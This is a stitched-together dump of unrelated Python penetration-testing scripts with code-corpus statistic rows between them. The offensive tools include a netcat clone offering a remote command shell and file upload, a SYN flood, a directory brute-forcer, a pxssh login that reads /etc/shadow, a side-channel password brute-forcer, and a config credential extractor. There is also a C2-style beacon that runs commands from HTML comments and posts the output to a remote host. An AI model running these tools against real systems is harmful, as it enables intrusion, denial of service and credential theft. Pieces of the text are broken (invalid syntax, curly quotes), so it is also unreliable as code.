with open(file, 'r') as f:
lines = [ line.strip() for line in f.readlines()]
except Exception as e:
Logger.err("Parsing file '{}' failed: {}.".format(file, str(e)))
return 0
num = 0
for technology in regexes:
if technology == 'Others':
continue
num0 = matchLines(file, lines, technology)
num += num0
if not config['no_others']:
num0 = matchLines(file, lines, 'Others')
num += num0
return num
def processDir(dirname):
num = 0
for filename in os.listdir(dirname):
newfilename = os.path.join(dirname, filename)
if os.path.isdir(newfilename):
num += processDir(newfilename)
elif os.path.isfile(newfilename):
num += processFile(newfilename)
return num
def parseOptions(argv):
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')
parser.add_argument('file', metavar='<file>', type=str, help='Config file or directory to process.')
parser.add_argument('-o', '--output', help = 'Output file.')
parser.add_argument('-H', '--with-filename', action='store_true', help = 'Print file name next to the results')
parser.add_argument('-R', '--show-nonunique', action='store_true', help = 'Print repeated, non unique credentials found. By default only unique references are returned.')
parser.add_argument('-C', '--lines', metavar='N', type=int, default=0, help='Display N lines around matched credential if verbose output is enabled.')
parser.add_argument('-f', '--format', choices=['raw', 'normal', 'tabular', 'csv'], default='normal', help="Specifies output format: 'raw' (only hashes), 'tabular', 'normal', 'csv'. Default: 'normal'")
parser.add_argument('-N', '--no-others', dest='no_others', action='store_true', help='Don\'t match "Others" category which is false-positives prone.')
parser.add_argument('-v', '--verbose', action='store_true', default=False, help='Display verbose output.')
parser.add_argument('-d', '--debug', action='store_true', default=False, help='Display debug output.')
if len(argv) < 2:
parser.print_help()
return False
args = parser.parse_args()
config['verbose'] = args.verbose
config['debug'] = args.debug
config['lines'] = args.lines
config['no_others'] = args.no_others
config['filename'] = args.with_filename
config['nonunique'] = args.show_nonunique
config['output'] = args.output
if args.format == 'raw':
config['format'] = 'raw'
elif args.format == 'tabular':
config['format'] = 'tabular'
elif args.format == 'csv':
config['format'] = 'csv'
else:
config['format'] == 'normal'
return args
def printResults():
global maxTechnologyWidth
global maxRegexpWidth
global results
# CSV Columns
cols = ['file', 'technology', 'name', 'hashes']
if not config['nonunique']:
results = set(results)
def _print(file, technology, rex, creds):
out = ''
if config['format'] == 'tabular':
out += '[+] {0: <{width1}} {1:^{width2}}: "{2:}"\n'.format(
technology, rex, creds,
width1 = maxTechnologyWidth, width2 = maxRegexpWidth
)
elif config['format'] == 'raw':
credstab = creds.split('", "')
longest = ''
for passwd in credstab:
if len(passwd) > len(longest):
longest = passwd
out += '{}\n'.format(
passwd
)
elif config['format'] == 'csv':
creds = '"{}"'.format(creds)
rex = rex.replace(config['csv_delimiter'], ' ')
out += config['csv_delimiter'].join([file, technology, rex, creds])
out += '\n'
else:
out += '[+] {}: {}: "{}"\n'.format(
technology, rex, creds
)
return out
maxTechnologyWidth = 0
maxRegexpWidth = 0
for result in results:
file, technology, rex, creds = result
if len(technology) > maxTechnologyWidth:
maxTechnologyWidth = len(technology)
if len(regexes[technology][rex]) > maxRegexpWidth:
maxRegexpWidth = len(regexes[technology][rex])
maxTechnologyWidth = maxTechnologyWidth + 3
maxRegexpWidth = maxRegexpWidth + 3
outputToPrint = ''
if config['format'] == 'normal' or config['format'] == 'tabular':
outputToPrint += '\n=== CREDENTIALS FOUND:\n'
elif config['format'] == 'csv':
outputToPrint += config['csv_delimiter'].join(cols)
outputToPrint += '\n'
resultsPerFile = {}
otherResultsPerFile = {}
for result in results:
file, technology, rex, creds = result
if technology == 'Others':
if file not in otherResultsPerFile.keys():
otherResultsPerFile[file] = []
otherResultsPerFile[file].append((technology, rex, creds))
else:
if file not in resultsPerFile.keys():
resultsPerFile[file] = []
resultsPerFile[file].append((technology, rex, creds))
for file, _results in resultsPerFile.items():
if config['filename'] and config['format'] in ['raw', 'normal', 'tabular']:
outputToPrint += '\nResults from file: "{}"\n'.format(file)
for result in _results:
technology, rex, creds = result
outputToPrint += _print(file, technology, rex, creds)
if not config['no_others'] and (config['format'] == 'normal' or config['format'] == 'tabular'):
outputToPrint += '\n\n=== BELOW LINES MAY BE FALSE POSITIVES:\n'
for file, _results in otherResultsPerFile.items():
if config['filename'] and config['format'] in ['raw', 'normal', 'tabular']:
outputToPrint += '\nResults from file: "{}"\n'.format(file)
for result in _results:
technology, rex, creds = result
outputToPrint += _print(file, technology, rex, creds)
return outputToPrint
def main(argv):
Logger._out('''
:: Network-configuration Credentials extraction script
Mariusz Banach / mgeeky, '18
''')
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
count = 0
for technology in regexes:
count += len(regexes[technology])
Logger.info('Capable of matching: {} patterns containing credentials.'.format(count))
num = 0
if os.path.isfile(opts.file):
num = processFile(opts.file)
elif os.path.isdir(opts.file):
num = processDir(opts.file)
else:
Logger.err('Please provide either file or directory on input.')
return False
out = printResults()
if config['output']:
Logger.info("Dumping credentials to the output file: '{}'".format(config['output']))
with open(config['output'], 'w') as f:
f.write(out)
else:
print(out)
if config['format'] == 'normal' or config['format'] == 'tabular':
print('\n[>] Found: {} credentials.'.format(num))
if __name__ == '__main__':
main(sys.argv)
| 36.899142 | 204 | 0.549377 |
cybersecurity-penetration-testing | from immlib import *
class cc_hook(LogBpHook):
def __init__(self):
LogBpHook.__init__(self)
self.imm = Debugger()
def run(self,regs):
self.imm.log("%08x" % regs['EIP'],regs['EIP'])
self.imm.deleteBreakpoint(regs['EIP'])
return
def main(args):
imm = Debugger()
calc = imm.getModule("calc.exe")
imm.analyseCode(calc.getCodebase())
functions = imm.getAllFunctions(calc.getCodebase())
hooker = cc_hook()
for function in functions:
hooker.add("%08x" % function, function)
return "Tracking %d functions." % len(functions)
| 19.96875 | 55 | 0.552239 |
cybersecurity-penetration-testing | import sys
import time
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
class Screenshot(QWebView):
def __init__(self):
self.app = QApplication(sys.argv)
QWebView.__init__(self)
self._loaded = False
self.loadFinished.connect(self._loadFinished)
def wait_load(self, delay=0):
while not self._loaded:
self.app.processEvents()
time.sleep(delay)
self._loaded = False
def _loadFinished(self, result):
self._loaded = True
def get_image(self, url):
self.load(QUrl(url))
self.wait_load()
frame = self.page().mainFrame()
self.page().setViewportSize(frame.contentsSize())
image = QImage(self.page().viewportSize(), QImage.Format_ARGB32)
painter = QPainter(image)
frame.render(painter)
painter.end()
return image
s = Screenshot()
image = s.get_image('http://www.packtpub.com')
image.save('website.png')
| 25 | 72 | 0.609082 |
cybersecurity-penetration-testing | #!/usr/bin/python3
#
# This script takes an input file containing Node names to be marked in Neo4j database as
# owned = True. The strategy for working with neo4j and Bloodhound becomes fruitful during
# complex Active Directory Security Review assessments or Red Teams. Imagine you've kerberoasted
# a number of accounts, access set of workstations or even cracked userPassword hashes. Using this
# script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your
# future use of BloodHound.
#
# Mariusz Banach / mgeeky
#
import sys
import os
import time
try:
from neo4j import GraphDatabase
except ImportError:
print('[!] "neo4j >= 1.7.0" required. Install it with: python3 -m pip install neo4j')
#
# ===========================================
#
# Specify neo4j connection details
NEO4J_CONNECTION_DETAILS = \
{
'Host': '127.0.0.1', # neo4j listening address.
'Port': 7687, # Bolt port
'User': 'neo4j',
'Pass': 'neo4j1'
}
#
# ===========================================
#
#
# Construct a MATCH ... SET owned=TRUE query of not more than this number of nodes.
# This number impacts single query execution time. If it is more than 1000, neo4j may complain
# about running out of heap memory space (java...).
#
numberOfNodesToAddPerStep = 500
def markNodes(tx, nodes):
query = ''
for i in range(len(nodes)):
n = nodes[i]
query += 'MATCH (n {name: "' + n + '"}) SET n.owned=TRUE RETURN 1'
if i < len(nodes) - 1: query += ' UNION'
query += '\n'
tx.run(query)
def main(argv):
if len(argv) != 2:
print('''
Takes a file containing node names on input and marks them as Owned in specified neo4j database.
Usage: ./markOwnedNodesInNeo4j.py <nodes-file>
''')
return False
nodesFile = argv[1]
programStart = time.time()
if not os.path.isfile(nodesFile):
print(f'[!] Input file containing nodes does not exist: "{nodesFile}"!')
return False
nodes = []
with open(nodesFile) as f: nodes = [x.strip() for x in f.readlines()]
try:
driver = GraphDatabase.driver(
f"bolt://{NEO4J_CONNECTION_DETAILS['Host']}:{NEO4J_CONNECTION_DETAILS['Port']}",
auth = (NEO4J_CONNECTION_DETAILS['User'], NEO4J_CONNECTION_DETAILS['Pass']),
encrypted = False,
connection_timeout = 10,
max_retry_time = 5,
keep_alive = True
)
except Exception as e:
print(f'[-] Could not connect to the neo4j database. Reason: {str(e)}')
return False
print('[.] Connected to neo4j instance.')
if len(nodes) >= 200:
print('[*] Warning: Working with a large number of nodes may be time-consuming in large databases.')
print('\te.g. setting 1000 nodes as owned can take up to 10 minutes easily.')
print()
finishEta = 0.0
totalTime = 0.0
runs = 0
print('[+] To be marked: {} nodes.'.format(len(nodes)))
try:
with driver.session() as session:
for a in range(0, len(nodes), numberOfNodesToAddPerStep):
b = a + min(numberOfNodesToAddPerStep, len(nodes) - a)
print(f'[.] Marking nodes ({a}..{b}) ...')
start = time.time()
session.write_transaction(markNodes, nodes[a:b])
stop = time.time()
totalTime += (stop - start)
runs += 1
finishEta = ((len(nodes) / numberOfNodesToAddPerStep) - runs) * (totalTime / float(runs))
if finishEta < 0: finishEta = 0
print(f'[+] Marked {b-a} nodes in {stop - start:.3f} seconds. Finish ETA: in {finishEta:.3f} seconds.')
except KeyboardInterrupt:
print('[.] User interruption.')
driver.close()
return False
driver.close()
programStop = time.time()
print(f'\n[+] Nodes marked as owned successfully in {programStop - programStart:.3f} seconds.')
if __name__ == '__main__':
main(sys.argv)
| 30.403101 | 119 | 0.597284 |
cybersecurity-penetration-testing | from subprocess import call
import chipwhisperer.capture.ChipWhispererCapture as cwc
from chipwhisperer.capture.scopes.ChipWhispererExtra import CWPLLDriver
import time
try:
from PySide.QtCore import *
from PySide.QtGui import *
except ImportError:
print "ERROR: PySide is required for this program"
sys.exit()
def pe():
QCoreApplication.processEvents()
def resetAVR():
call(["/usr/bin/avrdude", "-c", "avrispmkII", "-p", "m328p"])
#Make the application
app = cwc.makeApplication()
#If you DO NOT want to overwrite/use settings from the GUI version including
#the recent files list, uncomment the following:
#app.setApplicationName("Capture V2 Scripted")
#Get main module
cap = cwc.ChipWhispererCapture()
#Show window - even if not used
cap.show()
#NB: Must call processEvents since we aren't using proper event loop
pe()
cap.setParameter(['Generic Settings', 'Scope Module', 'ChipWhisperer/OpenADC'])
cap.setParameter(['Generic Settings', 'Target Module', 'Simple Serial'])
cap.setParameter(['Target Connection', 'connection', 'ChipWhisperer'])
#Load FW (must be configured in GUI first)
cap.FWLoaderGo()
#NOTE: You MUST add this call to pe() to process events. This is done automatically
#for setParameter() calls, but everything else REQUIRES this, since if you don't
#signals will NOT be processed correctly
pe()
#Connect to scope
cap.doConDisScope(True)
pe()
cmds = [
['OpenADC', 'Gain Setting', 'Setting', 40],
['OpenADC', 'Trigger Setup', 'Mode', 'falling edge'],
['OpenADC', 'Trigger Setup', 'Timeout (secs)', 7.0],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'EXTCLK x1 via DCM'],
['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Front Panel A', False],
['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Target IO1 (Serial TXD)', True],
['CW Extra', 'CW Extra Settings', 'Clock Source', 'Target IO-IN'],
['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None]
]
for cmd in cmds: cap.setParameter(cmd)
#Connect to serial port
ser = cap.target.driver.ser
ser.con()
#Set baud rate
cap.setParameter(['Serial Port Settings', 'TX Baud', 9600])
cap.setParameter(['Serial Port Settings', 'RX Baud', 9600])
#Attach special method so we can call from GUI if wanted
cap.resetAVR = resetAVR
#Some useful commands to play with from GUI
#self.resetAVR()
#ser = self.target.driver.ser
#ser.write("@@@")
#ser.write("ce")
#print ser.read(255)
#Run Application
#app.exec_()
lowest = 32
highest = 126
pass_array = [lowest, lowest]
bytefound = [0, 0]
done = 0
while not done:
cap.resetAVR()
time.sleep(0.1)
ser.write("@@@")
time.sleep(0.1)
cap.scope.arm()
pe()
ser.write(chr(pass_array[0]) + chr(pass_array[1]))
if cap.scope.capture(update=True, NumberPoints=None, waitingCallback=pe):
print "Timeout"
else:
print "Capture OK"
print "Trying {0}{1}".format(chr(pass_array[0]), chr(pass_array[1]))
if not bytefound[0] and min(cap.scope.datapoints[10000:14000]) > -0.1:
print "Byte 1 Wrong"
pass_array[0] += 1
elif not bytefound[1] and min(cap.scope.datapoints[18000:22000]) > -0.1:
bytefound[0] = 1
print "Byte 2 Wrong"
pass_array[1] += 1
else:
bytefound[1] = 1
print "PASSWORD: {0}{1}".format(chr(pass_array[0]), chr(pass_array[1]))
print "Password OK? Check response on serial"
done = 1
if pass_array[0] >= highest or pass_array[1] >= highest:
print "Charset exceeded. Expand range?"
done = 1
#print ser.read(255)
#Run Application
app.exec_()
#Disconnect before exit to save grief
cap.scope.dis()
cap.target.dis()
| 27.178295 | 83 | 0.679417 |
Python-Penetration-Testing-Cookbook | import urllib.request
import pandas as pd
from bs4 import BeautifulSoup
url = "https://www.w3schools.com/html/html_tables.asp"
try:
page = urllib.request.urlopen(url)
except Exception as e:
print(e)
pass
soup = BeautifulSoup(page, "html.parser")
table = soup.find_all('table')[0]
new_table = pd.DataFrame(
columns=['Company', 'Contact', 'Country'],
index=range(0, 7))
row_number = 0
for row in table.find_all('tr'):
column_number = 0
columns = row.find_all('td')
for column in columns:
new_table.iat[row_number, column_number] = column.get_text()
column_number += 1
row_number += 1
print(new_table)
# Uncomment the bellow line to export to csv
# new_table.to_csv('table.csv')
# Uncomment the bellow line to export to excel
# new_table.to_excel('table.xlsx')
| 23.727273 | 68 | 0.676074 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
owtf | """
owtf.proxy.socket_wrapper
~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import ssl
from tornado import ioloop
from owtf.proxy.gen_cert import gen_signed_cert
def starttls(
socket,
domain,
ca_crt,
ca_key,
ca_pass,
certs_folder,
success=None,
failure=None,
io=None,
**options
):
"""Wrap an active socket in an SSL socket.
Taken from https://gist.github.com/weaver/293449/4d9f64652583611d267604531a1d5f8c32ac6b16.
:param socket:
:type socket:
:param domain:
:type domain:
:param ca_crt:
:type ca_crt:
:param ca_key:
:type ca_key:
:param ca_pass:
:type ca_pass:
:param certs_folder:
:type certs_folder:
:param success:
:type success:
:param failure:
:type failure:
:param io:
:type io:
:param options:
:type options:
:return:
:rtype:
"""
# # Default Options
options.setdefault("do_handshake_on_connect", False)
options.setdefault("ssl_version", ssl.PROTOCOL_TLS)
options.setdefault("server_side", True)
# The idea is to handle domains with greater than 3 dots using wildcard certs
if domain.count(".") >= 3:
key, cert = gen_signed_cert(
"*." + ".".join(domain.split(".")[-3:]),
ca_crt,
ca_key,
ca_pass,
certs_folder,
)
else:
key, cert = gen_signed_cert(domain, ca_crt, ca_key, ca_pass, certs_folder)
options.setdefault("certfile", cert)
options.setdefault("keyfile", key)
# Handlers
def done():
"""Handshake finished successfully."""
io.remove_handler(wrapped.fileno())
success and success(wrapped)
def error():
"""The handshake failed."""
if failure:
return failure(wrapped)
# # By default, just close the socket.
io.remove_handler(wrapped.fileno())
wrapped.close()
def handshake(fd, events):
"""Handshake sequence with Tornado
:param fd:
:type fd:
:param events:
:type events:
:return:
:rtype:
"""
if events & io.ERROR:
error()
return
try:
new_state = io.ERROR
wrapped.do_handshake()
return done()
except ssl.SSLError or ssl.SSLEOFError as exc:
if exc.args[0] == ssl.SSL_ERROR_WANT_READ:
new_state |= io.READ
elif exc.args[0] == ssl.SSL_ERROR_WANT_WRITE:
new_state |= io.WRITE
else:
raise
if new_state != state[0]:
state[0] = new_state
io.update_handler(fd, new_state)
# set up handshake state; use a list as a mutable cell.
io = io or ioloop.IOLoop.current()
state = [io.ERROR]
# Wrap the socket; swap out handlers.
io.remove_handler(socket.fileno())
try:
wrapped = ssl.wrap_socket(socket, **options)
except TypeError:
# if python version less than 3.7
wrapped = ssl.SSLSocket(socket, **options)
wrapped.setblocking(0)
io.add_handler(wrapped.fileno(), handshake, state[0])
# Begin the handshake.
handshake(wrapped.fileno(), 0)
return wrapped
| 23.507576 | 94 | 0.56308 |
Penetration_Testing | '''
Netcat replacement in Python.
Suggestions:
* Run as Python script or as executable to suit your needs.
'''
import sys
import socket
import getopt
import threading
import subprocess
# Define global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = ""
def usage():
print '''
<PyNet>\n
Usage: pynet.py -t <target_IP> -p <port>\n
Options:
-l --listen : listen on <host>:<port> for incoming connections
-e --execute=<file to run> : execute the given file upon receiving a connection
-c --command : initialize a command shell
-u --upload=<destination> : upon receiving a connection, upload a file and write to <destination>
Examples:
pynet.py -t 192.168.0.1 -p 5555 -l -c
pynet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe
pynet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"
echo 'ABCDEFGHI' | ./pynet.py -t 192.168.11.12 -p 135
'''
sys.exit(0)
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect((target, port))
if len(buffer):
client.send(buffer)
while True:
# Wait for data
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data
if recv_len < 4096:
break
print response
# Wait for more input
buffer = raw_input("")
buffer += "\n"
# Send the input
client.send(buffer)
except:
print "[!] Error! Exiting..."
client.close()
def server_loop():
global target
# If no target is defined, we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target, port))
server.listen(5)
while True:
client_socket, addr = server.accept()
print "[+] Received connection from: {}".format(addr)
# Spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler,
args=(client_socket,))
client_thread.start()
def run_command(command):
# Trim the newline
command = command.rstrip()
# Run the command and get the output back
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
output = "[!] Failed to execute command.\r\n"
# Send the output back to the client
return output
def client_handler(client_socket):
global upload
global execute
global command
# Check for upload
if len(upload_destination):
# Read in all of the bytes and write to our destination
file_buffer = ""
# Keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# Take the bytes and try to write them out
try:
file_descriptor = open(upload_destination, "wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# Acknowledge that we wrote the file out
client_socket.send("[+] Successfully saved file to: {}\r\n".format(upload_destination))
except:
client_socket.send("[!] Failed to save file to: {}\r\n".format(upload_destination))
# Check for command execution
if len(execute):
# Run the command
output = run_command(execute)
client_socket.send(output)
# Go into another loop if a command shell was requested
if command:
while True:
# Show a simple prompt
client_socket.send("<PyNet:#> ")
# Receive until we see a linefeed <enter key>
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
# Send back the command output
response = run_command(cmd_buffer)
# Send back the response
client_socket.send(response)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# Read the command line options
try:
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu", ["help", "listen", "execute", "target", "port", "command", "upload"])
except:
print str(err)
usage()
for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
# Are we going to listen or just send data from stdin?
if not listen and len(target) and port > 0:
'''
Read in the buffer from the commandline this will block,
so send CTRL-D if not sending input to stdin
'''
print "[*] Press CTRL-D to enter an interactive shell."
buffer = sys.stdin.read()
# Send data
client_sender(buffer)
'''
We are going to listen and potentially upload things, execute
commands, and drop a shell back depending on our command line
options
'''
if listen:
server_loop()
main()
| 20.663755 | 126 | 0.664315 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import pxssh
def send_command(s, cmd):
s.sendline(cmd)
s.prompt()
print s.before
def connect(host, user, password):
try:
s = pxssh.pxssh()
s.login(host, user, password)
return s
except:
print '[-] Error Connecting'
exit(0)
s = connect('127.0.0.1', 'root', 'toor')
send_command(s, 'cat /etc/shadow | grep root')
| 16.5 | 46 | 0.563246 |
cybersecurity-penetration-testing | import urllib
import urllib2
import threading
import Queue
threads = 50 # Be aware that a large number of threads can cause a denial of service!!!
target_url = "http://www.example.com"
wordlist_file = "directory-list.txt"
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
def wordlist(wordlist_file):
# read in the word list file
wordlist_file = open(wordlist_file,"rb")
raw_words = wordlist_file.readlines()
wordlist_file.close()
words = Queue.Queue()
# iterating over each word in the word file
for word in raw_words:
word = word.rstrip()
words.put(word)
return words
def dir_bruteforce(extensions=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
# check if there is a file extension if not
# it's a directory path we're bruting
if "." not in attempt:
attempt_list.append("/%s/" % attempt)
else:
attempt_list.append("/%s" % attempt)
# if we want to bruteforce extensions
if extensions:
for extension in extensions:
attempt_list.append("/%s%s" % (attempt,extension))
# iterate over our list of attempts
for brute in attempt_list:
url = "%s%s" % (target_url,urllib.quote(brute))
try:
headers = {}
headers["User-Agent"] = user_agent
r = urllib2.Request(url,headers=headers)
response = urllib2.urlopen(r)
if len(response.read()):
print "[%d] => %s" % (response.code,url)
except urllib2.HTTPError,e:
if e.code != 404:
print "!!! %d => %s" % (e.code,url)
pass
word_queue = wordlist(wordlist_file)
extensions = [".php",".bak",".orig",".inc"]
for i in range(threads):
t = threading.Thread(target=dir_bruteforce,args=(extensions,))
t.start() | 28.473684 | 101 | 0.513176 |
Python-Penetration-Testing-Cookbook |
from scapy.all import *
iface = "en0"
destination_ip = '192.168.1.5'
def synFlood(destination, iface):
print ("Starting SYN Flood")
paket=IP(dst=destination,id=1111,ttl=99)/TCP(sport=RandShort(),dport=[22,80],seq=12345,ack=1000,window=1000,flags="S")/"HaX0r SVP"
ans,unans=srloop(paket, iface=iface, inter=0.3,retry=2,timeout=4)
ans.summary()
unans.summary()
try:
synFlood(destination_ip, iface)
except KeyboardInterrupt:
print("Exiting.. ")
sys.exit(0)
| 26.222222 | 134 | 0.687117 |
cybersecurity-penetration-testing | import socket
from datetime import datetime
net= raw_input("Enter the IP address ")
net1= net.split('.')
a = '.'
net2 = net1[0]+a+net1[1]+a+net1[2]+a
st1 = int(raw_input("Enter the Starting Number "))
en1 = int(raw_input("Enter the Last Number "))
en1=en1+1
t1= datetime.now()
def scan(addr):
sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = sock.connect_ex((addr,445))
if result==0:
return 1
else :
return 0
def run1():
for ip in xrange(st1,en1):
addr = net2+str(ip)
if (scan(addr)):
print addr , "is live"
run1()
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total | 21.517241 | 55 | 0.673313 |
Python-Penetration-Testing-for-Developers | import requests
import re
import subprocess
import time
import os
while 1:
req = requests.get("http://127.0.0.1")
comments = re.findall('<!--(.*)-->',req.text)
for comment in comments:
if comment = " ":
os.delete(__file__)
else:
try:
response = subprocess.check_output(comment.split())
except:
response = �command fail�
data={"comment":(''.join(response)).encode("base64")}
newreq = requests.post("http://127.0.0.1notmalicious.com/xss/easy/addguestbookc2.php ", data=data)
time.sleep(30)
| 23.666667 | 99 | 0.667311 |
Python-Penetration-Testing-for-Developers | import re
import random
import urllib
url1 = raw_input("Enter the URL ")
u = chr(random.randint(97,122))
url2 = url1+u
http_r = urllib.urlopen(url2)
content= http_r.read()
flag =0
i=0
list1 = []
a_tag = "<*address>"
file_text = open("result.txt",'a')
while flag ==0:
if http_r.code == 404:
file_text.write("--------------")
file_text.write(url1)
file_text.write("--------------\n")
file_text.write(content)
print content
for match in re.finditer(a_tag,content):
i=i+1
s= match.start()
e= match.end()
list1.append(s)
list1.append(e)
if (i>0):
print "Coding is not good"
if len(list1)>0:
a= list1[1]
b= list1[2]
print content[a:b]
else:
print "error handling seems ok"
flag =1
elif http_r.code == 200:
print "Web page is using custome Error page"
break
| 15.918367 | 46 | 0.603865 |
cybersecurity-penetration-testing | import requests
import re
from bs4 import BeautifulSoup
import sys
scripts = []
if len(sys.argv) != 2:
print "usage: %s url" % (sys.argv[0])
sys.exit(0)
tarurl = sys.argv[1]
url = requests.get(tarurl)
soup = BeautifulSoup(url.text)
for line in soup.find_all('script'):
newline = line.get('src')
scripts.append(newline)
for script in scripts:
if "jquery.min" in str(script).lower():
print script
url = requests.get(script)
comments = re.findall(r'\d[0-9a-zA-Z._:-]+',url.text)
if comments[0] == "2.1.1" or comments[0] == "1.12.1":
print "Up to date"
else:
print "Out of date"
print "Version detected: "+comments[0]
#try:
# if newline[:4] == "http":
# if tarurl in newline:
# urls.append(str(newline))
# elif newline[:1] == "/":
# combline = tarurl+newline
# urls.append(str(combline))
#except:
# pass
# print "failed"
#for uurl in urls:
# if "jquery" in url:
# | 20.642857 | 55 | 0.638767 |
Python-Penetration-Testing-Cookbook | #! /usr/bin/env python
from scapy.all import *
def parsePacket(pkt):
if ARP in pkt and pkt[ARP].op in (1,2):
return pkt.sprintf("%ARP.hwsrc% %ARP.psrc%")
sniff(prn=parsePacket, filter="arp", store=0)
| 19.181818 | 52 | 0.633484 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-07 23:03
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nmaper', '0003_nmapprofile'),
]
operations = [
migrations.AddField(
model_name='nmapscan',
name='status_text',
field=models.CharField(default='waiting', max_length=16),
preserve_default=False,
),
]
| 21.863636 | 69 | 0.595618 |
Penetration-Testing-Study-Notes | #!/usr/bin/python2.7
# Copyright (c) 2003-2012 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# $Id: samrdump.py 592 2012-07-11 16:45:20Z bethus@gmail.com $
#
# Description: DCE/RPC SAMR dumper.
#
# Author:
# Javier Kohen <jkohen@coresecurity.com>
# Alberto Solino <bethus@gmail.com>
#
# Reference for:
# DCE/RPC for SAMR
import socket
import string
import sys
import types
from impacket import uuid, version
from impacket.dcerpc import dcerpc_v4, dcerpc, transport, samr
import argparse
class ListUsersException(Exception):
pass
class SAMRDump:
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\samr]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\samr]', 445),
}
def __init__(self, protocols = None,
username = '', password = '', domain = '', hashes = None):
if not protocols:
protocols = SAMRDump.KNOWN_PROTOCOLS.keys()
self.__username = username
self.__password = password
self.__domain = domain
self.__protocols = [protocols]
self.__lmhash = ''
self.__nthash = ''
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def dump(self, addr):
"""Dumps the list of users and shares registered present at
addr. Addr is a valid host name or IP address.
"""
encoding = sys.getdefaultencoding()
print 'Retrieving endpoint list from %s' % addr
# Try all requested protocols until one works.
entries = []
for protocol in self.__protocols:
protodef = SAMRDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
print "Trying protocol %s..." % protocol
rpctransport = transport.SMBTransport(addr, port, r'\samr', self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
try:
entries = self.__fetchList(rpctransport)
except Exception, e:
print 'Protocol failed: %s' % e
raise
else:
# Got a response. No need for further iterations.
break
# Display results.
for entry in entries:
(username, uid, user) = entry
base = "%s (%d)" % (username, uid)
print base + '/Enabled:', ('false', 'true')[user.is_enabled()]
print base + '/Last Logon:', user.get_logon_time()
print base + '/Last Logoff:', user.get_logoff_time()
print base + '/Kickoff:', user.get_kickoff_time()
print base + '/Last PWD Set:', user.get_pwd_last_set()
print base + '/PWD Can Change:', user.get_pwd_can_change()
print base + '/PWD Must Change:', user.get_pwd_must_change()
print base + '/Group id: %d' % user.get_group_id()
print base + '/Bad pwd count: %d' % user.get_bad_pwd_count()
print base + '/Logon count: %d' % user.get_logon_count()
items = user.get_items()
for i in samr.MSRPCUserInfo.ITEMS.keys():
name = items[samr.MSRPCUserInfo.ITEMS[i]].get_name()
name = name.encode(encoding, 'replace')
print base + '/' + i + ':', name
if entries:
num = len(entries)
if 1 == num:
print 'Received one entry.'
else:
print 'Received %d entries.' % num
else:
print 'No entries received.'
def __fetchList(self, rpctransport):
dce = dcerpc.DCERPC_v5(rpctransport)
encoding = sys.getdefaultencoding()
entries = []
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
rpcsamr = samr.DCERPCSamr(dce)
try:
resp = rpcsamr.connect()
if resp.get_return_code() != 0:
raise ListUsersException, 'Connect error'
_context_handle = resp.get_context_handle()
resp = rpcsamr.enumdomains(_context_handle)
if resp.get_return_code() != 0:
raise ListUsersException, 'EnumDomain error'
domains = resp.get_domains().elements()
print 'Found domain(s):'
for i in range(0, resp.get_entries_num()):
print " . %s" % domains[i].get_name()
print "Looking up users in domain %s" % domains[0].get_name()
resp = rpcsamr.lookupdomain(_context_handle, domains[0])
if resp.get_return_code() != 0:
raise ListUsersException, 'LookupDomain error'
resp = rpcsamr.opendomain(_context_handle, resp.get_domain_sid())
if resp.get_return_code() != 0:
raise ListUsersException, 'OpenDomain error'
domain_context_handle = resp.get_context_handle()
resp = rpcsamr.enumusers(domain_context_handle)
